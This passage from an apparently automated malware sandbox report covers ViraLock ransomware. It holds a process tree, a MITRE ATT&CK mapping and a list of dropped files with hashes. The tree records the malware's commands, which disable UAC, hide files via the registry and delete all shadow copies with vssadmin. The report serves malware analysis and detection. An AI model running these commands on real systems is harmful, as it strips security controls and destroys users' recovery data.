        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KessMAQA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        26⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        24⤵
        
        PID:3944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        24⤵
        
        PID:932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        24⤵
        
        PID:292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OyQIUUIQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        24⤵
        
        PID:4908
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        25⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        22⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        22⤵
        
        PID:5736
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        22⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GyAQIQYw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        22⤵
        
        PID:5516
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        23⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        20⤵
        
        PID:5652
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        20⤵
        
        PID:3652
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        20⤵
        
        PID:5864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BKwAsgQU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        20⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        
        PID:5384
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        
        PID:1792
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        18⤵
        UAC bypass
        
        PID:5792
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bWwgwYkk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        18⤵
        System Location Discovery: System Language Discovery
        
        PID:5904
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        19⤵
        
        PID:3132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        Modifies registry key
        
        PID:6008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        
        PID:4564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EcMYMUMk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        16⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:3228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        14⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        14⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        14⤵
        
        PID:5916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YIcUQQwU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        14⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        15⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        
        PID:5512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uakEQIog.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        12⤵
        
        PID:5300
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        
        PID:5400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        
        PID:4548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XsYMgYAo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        10⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        11⤵
        
        PID:5124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        
        PID:5968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        UAC bypass
        
        PID:5984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hgkIQskQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        8⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        
        PID:1944
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5312
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:5320
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:5328
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NikcsAwU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5344
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        
        PID:5700
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:4084
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:2576
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      PID:4368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jyUggUEI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
      4⤵
      PID:4444
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:5164
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
    3⤵
    PID:5196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1908,10300507110523771928,10431451577263293318,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5976 /prefetch:8
    3⤵
    PID:5480
- C:\Windows\System32\vssadmin.exe
  "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2004
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3520

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:3812

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3820

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3996

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4064

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4352

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
1⤵
PID:5112

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2412

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1432

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\User Account Pictures\user.bmp.exe

Filesize
779KB

MD5
a8b57a44999b91553f3c10e4d8e2dfba

SHA1
98ddabedf1900f66d907b6b520f30a93c35bcc40

SHA256
85ac2a4ee57dd6009a132b03b2fe24d54465c95ea828240411095e5b5c12b9fa

SHA512
bf47d80681c47a40b7d5fcb46f691bddc05583c74815d335174c3d5ce4c56f45e66c2145e03238b6b1dd310d9d6d5d81b66106c2fea28f5ef40209df8f0709af

Download Submit
C:\ProgramData\rcMUYMwY\JgYkoUIo.exe

Filesize
194KB

MD5
a1e70949bdd8619bd7d076373e041597

SHA1
339899e5ebb835fc534d4b6c70ed68ff9431a281

SHA256
70579f81addd53b7ccf56c89ea631effa4b05cd5577004c8c9af8cb742761f67

SHA512
6810aa940b1069399f3d477f043222ba820f07ca1d8b6a3e0d06d54b25e7e048e837b04513ade1df756e524701bd0fe8b35efefbf02987a21a2f553d4f554cc2

Download Submit
C:\Recovery\WindowsRE\!WannaDecryptor!.exe.lnk

Filesize
590B

MD5
08cbfc827d94839d3dac613f85ba4a65

SHA1
9c6bf286299c0451974f9c7b176d00a19a6638b2

SHA256
cbb7eac8a3f0f2c2634da918914965b582c60831675345ee037cbda8be12bf2c

SHA512
fb69e5517a5a6dde941bbd5d162384fe431f2e21ac52527cd8ace18ddd46767e715be614a91569fd0a5a211bea75250417b1632dcd57675eb66c2b8ade23d7cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
228fefc98d7fb5b4e27c6abab1de7207

SHA1
ada493791316e154a906ec2c83c412adf3a7061a

SHA256
448d09169319374935a249b1fc76bcf2430b4e1436611f3c2f3331b6eafe55a2

SHA512
fa74f1cc5da8db978a7a5b8c9ebff3cd433660db7e91ce03c44a1d543dd667a51659ba79270d3d783d52b9e45d76d0f9467458df1482ded72ea79c873b2a5e56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
026e0c65239e15ba609a874aeac2dc33

SHA1
a75e1622bc647ab73ab3bb2809872c2730dcf2df

SHA256
593f20dfb73d2b81a17bfcc1f246848080dfc96898a1a62c5ddca62105ed1292

SHA512
9fb7644c87bdd3430700f42137154069badbf2b7a67e5ac6c364382bca8cba95136d460f49279b346703d4b4fd81087e884822a01a2a38901568a3c3e3387569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\43528dfb-c8e9-4320-a5ff-857df65a8e8e.tmp

Filesize
1KB

MD5
7a2f5dc4f205f2ad9e64ca0995df5356

SHA1
d8975098dc831c6d8e4930e84cc13f43535f8f2e

SHA256
230886ba4a7e5ada56dcea737d56b841c48f5282940196e82e8958402690184f

SHA512
907cc1adb18fa732b295080016f90dce4de2c7321378d447506342320cbe0b50e52e297e0c5f9b351202a19bb3da4569cc432a6a2ddd640134074ad66b75959c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
035ca9a696f046c93815fb3a12c4b494

SHA1
1ad17389103beef8a7184f52188b6336284208a6

SHA256
509b11e02d45c679f16f8d2ec14c4ffa578db9fa9a6fc8b78f6bbbb3fc2666cf

SHA512
004b581a09846979a3badc755427e2c4ce9e28b5bd5b0463fd512c9b3ec503d25837f025b8db6969dd309c962ef30e6b276dda34dd140e80f12c5d9ff5849771

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
796B

MD5
0f6c04e311ba7e5f5c60ee57eca09786

SHA1
97024b7ef501e6b7513f3107cb501e54f57f7c8e

SHA256
ebe399baa76b4197f53f5ab5f6f226f906b09c7f30476b10f35a338b60dbd74e

SHA512
5d0c48976573d3654906d6388263d4f5e887fc7e2b8da44d80b4780652c52ff2b0aa4863a16c9e79a2c993b858dd23fac29146636e5fbbae1d119df911364a57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
632a55b46b7f08634fe15b08483743b3

SHA1
c661b61f4be13c8b1e5fa5a6267ca2d0b492220a

SHA256
07a687146b6c9a666321d6f4cbb64096b9b22f0742d45706dd5ecfb429fedd57

SHA512
2ea7aea85017b8f59beb14c5ec776c878dec8e762fc7b6cdd7e76056a123ff41f9bc7997e615e8e5f36a61a0ca8afce7d9418d42e0b71913b69f0566f24e7408

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8125379eb05323943b83f60cbf88dac1

SHA1
755799ecdcafb45c8f2b822593b3f8151f3b7c53

SHA256
92d9042d57dae0c84947fe2f2d570871323ff69195cdf98c1acfe7f046afe150

SHA512
e771b455ffbf9fe50aa544c120d82c8116280e6873dab307af91f2cabf3599de40376f7097e8b4da17043ffa6e9d442dfd0b1f0a1d6b467c19aef60fd5810ed2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f0782833ec25078978a81770876201e8

SHA1
175b79587e4094581ee3d1eb186c9bbca32b1e90

SHA256
2dee3ce8c04e131a59644973736f316642db2b82f4c7710f31b3f4a570cefa70

SHA512
5a0a133c3cc29c4d84f0963666bc5052414137f64c5c5401392187292278368dd99d13de2dc2438b8ec7dc730fb73587601406dae5d271c3aed8c805aebae048

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
730ae81e338ebc88c052a369e3f31843

SHA1
75c91aaff0b24a6f313ec03663836215146859e9

SHA256
e0492c241cef6eb133b411f2b4a780f3e441c6c55c5b2b2ecfa6da921bd138a5

SHA512
a1b4a987ca4989a7a7481d498ca1d6b6e19fd5bfe3afc0f3ab1366dae21433df6a600d8a404df25cd8a7b6358f832a09768a008f5911a60d2ad754796f7af444

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e394e0bab3ad7ba8fb6c2b4d57ae4149

SHA1
3b0fa66bf78ce430bfc8b196ee0c72f3f1955cf5

SHA256
3233e3bfaeae9acf42c8e07125142d3fbae61cbda0bd6c8bf6502db1ef7beafd

SHA512
4c285ede7fab992a399c2e4cd86da6ba4f57ff3c756d7b1b7c79c831e8d5c20d7b22fc5b5b3958611f5ef92a8b5b1d085dfbc62c567c5bfe0bd97ea26e864418

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
d534434584e47e727eb082de2ad092d8

SHA1
0daaa406e44dcb266cdf00d4ff74244cd763ee7d

SHA256
632401185facb3d20624fc03c96a52302d2ac3c584292dc91e58f06b7711454f

SHA512
7c1e9982e92fb23df7b37427a97d84ac81805887bdef1aabc19badcf59c546b234a15cc769b70c5366b1a54b70398cee75036735ec66d1c92da7891ebf671c2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
919c1c79fce489dd51eddbb622b35fad

SHA1
75746e5330b0c84b269f57b41b4782bebcd38d02

SHA256
0665333b00334481d765c50b20bb6ac2145523a82eca3e51867e0b745a871d9e

SHA512
c90c933f1e52bc2c94d380ab06f3fc6d9e963688c02892dab2e92004d0b748841fa7793a5736d65eb911ce98c28f6c26a10868268a73de6e6efac29889499030

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
0ba196f55ad8356c11be80f3d673fde5

SHA1
e40a762333440330e74725da438dc8337ce5f2b6

SHA256
4116510b018357142288e2839415d65e471944f0a6725979aa78bcebc1dcb4c8

SHA512
596c5353261c075913a2f3f875b30b829e32cb9a76e1cf84d8a71ed256cf9744cda3fe193e51a885181772d385abe7f39689fea652728932bbe1c67fca264836

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e07afc0a6e7e4fc974c9705d9f50f77f

SHA1
1b8234af9df3680a7c60c5c69716e29ac28209fa

SHA256
9c2b16b1a50e595196ce62b373f6d409f1ec28a33659be8f9eec727dd87861ae

SHA512
c9a4590d0911052f320945a100173724948079d76ec22484eb528775835d8a0da1820635fe1c40789813d9f25e1350c773f299cd87d92fbb2bdb76aedc88382f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
10b44e480b152bca76711087771598df

SHA1
aba9ee7d4a8d76a5867ccef0245c43744b5cccf7

SHA256
b3f7c11cb75e92f6fda423ebd917ebe292751bb60f1118ea2523ccd331c9c305

SHA512
7f2f7852045a0ba230af92c45f8ca5f823ff1f8ec86f21b0d0035c3c83080af1adaad506ace156240da98402c3a7c945299b5b5e447c57fb393c7874457b87a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
65383a8835274f221ac00e91111cfe1a

SHA1
ba78190c8bfd24c3589503f10bfca065f2946b84

SHA256
3b1584eeacc75bef7aaca69f37c94d87d678045ee634b9122772f9e3f48d475e

SHA512
82fdb9c136bb077678df5aa797567682a97b8b0489fb00a344ceeb2c6d2a3da20f2faec7017222f9f4c86d80493bca7e5e4a85f60882e086019e949c5b528207

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe583a64.TMP

Filesize
1KB

MD5
b2bc465001cebd59f2df8d003a278a5e

SHA1
515a405d5c45a607fd56ad9e893ea24d30c96360

SHA256
cb8c06653c156ddb79afc466cb3c2daa8171900858ac99151d422919d7dbd978

SHA512
6e78f6830111fe99b1cdcf7658f32ef78d2f89545d44ca0d80af408b901b25d5edc2d470dc48321d1c91f861b095ed575b1e399123fa6ef4d3f05a6b1f188f52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000002.dbtmp

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
13f898017eb288b97e15ff9655a00c74

SHA1
2eaeaff442407a911466053f1b08a28b0dc8bd3f

SHA256
af2fdcb50e2a97d19cb5803fe390bb3a50d678bc542c5cbefbeb43ead9941b6b

SHA512
dd19291abf4756927d30182f406975801c5485e44a210e5982589149aeaa0e824edc365f728cfe3ecb9d7d810c3a5c437e0527064630ff60d38763115dcb5325

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d4ddd38a49011ddae55549120bb7eeca

SHA1
19a490dd0cff88ac9f8e7c051c48446e6b4ea08a

SHA256
b591bf35a8ae2b784003e51e75b2053f96fc545d0db337b39c338ec5b16a60d4

SHA512
5205a2d715509143528629f8025e220a01d3d8aa5fd70bfe9420ac6a5b0db668be02766646d94f95915617baf0f73a4210e7acaf072c8745a7771ee3da75da41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
e85186f4894be3efa37f45c27fbf011d

SHA1
64da8708a1bc365322fbecd26a9dfa0ba7b0728f

SHA256
565ecaf0e0c3c1259e5cf343d5362c0ef0c7a19049e414a5cb8b3d8d1886b9b7

SHA512
6ec20da8241d43dd603b9c5e35d542b8ba4e5913c5acb55b5d33931c5eaeb9b92f34d9fcffd88a4598ddf8c50147010f7a1b7568144fc8b1b2f4951582cdb8cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
0e826969ab12e984e6e0cb56d4936fa0

SHA1
fd0514cb7fec9101159d5712ff41ccfb2bbac21e

SHA256
c296eef38ae59382ad8c8ab275fdc0f0bb621b1ea280b54ca4768e75a3ad9588

SHA512
17524c30f72138ed47e4b3d4458c241bb1c2365784ef57b735c1e9eb45fc5c756d68695c122f5eb7cb81ed672a85f7d29b69a37dbb9c518abebc35d0bbe1abb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
6125b2b27a036dca59b552364f34471c

SHA1
eb2b96b0e275a320895f49fa7aa1dcc316c70e64

SHA256
70930a135a6254ae3cf2fcf3caaea18b2e00725eb1faf929e55a136eb624c005

SHA512
da0cf964a36d9f6562f56314f9f74bae7576c47c924b7cb5791302a1d2cff44d206a3dde78ed872a63d190d1dac12a0810501f563290b20a37ce9cffecbd3a0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
